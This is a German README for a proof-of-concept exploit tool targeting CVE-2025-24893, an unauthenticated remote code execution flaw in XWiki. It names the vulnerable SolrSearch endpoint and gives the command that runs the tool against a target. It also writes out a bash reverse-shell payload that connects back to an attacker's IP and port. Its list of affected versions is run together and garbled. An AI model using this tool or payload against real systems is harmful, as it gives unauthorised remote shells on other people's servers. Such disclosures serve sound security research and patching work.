
Proof-of-Concept-Exploit für CVE-2025-24893, eine nicht authentifizierte Remote Code Execution (RCE)-Sicherheitslücke in XWiki. Nutzt eine Template-Injection-Schwachstelle im SolrSearch-Endpunkt über die Ausführung von Groovy-Skripten aus.
Proof-of-Concept-Exploit für CVE-2025-24893, eine kritische Remote Code Execution-Schwachstelle ohne Authentifizierung in XWiki.
Dieser Exploit missbraucht eine Groovy-Template-Injection im SolrSearch-Endpunkt, um ohne Authentifizierung beliebige Befehle auszuführen – einschließlich Reverse Shells.
Ein Fehler in der Art und Weise, wie XWiki manipulierte Eingaben an den SolrSearch-RSS-Endpunkt verarbeitet, ermöglicht Angreifern, Groovy-Code in die Rendering-Pipeline einzuschleusen.
Dies ermöglicht unauthorisierte RCE über {{groovy}}-Skriptblöcke.
< 15.10.11>= 16.0.0 und < 16.4.115.10.1116.4.1Laden Sie das Release herunter:
oder bauen Sie es aus dem Quellcode:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
Es gibt einen vorgefertigten Reverse-Shell-Payload in dieser Form:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Dieser Code ist nur für Bildungszwecke und autorisierte Sicherheitsforschung bestimmt. Verwenden Sie diesen Exploit nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
/bin/get/Main/SolrSearch?media=rss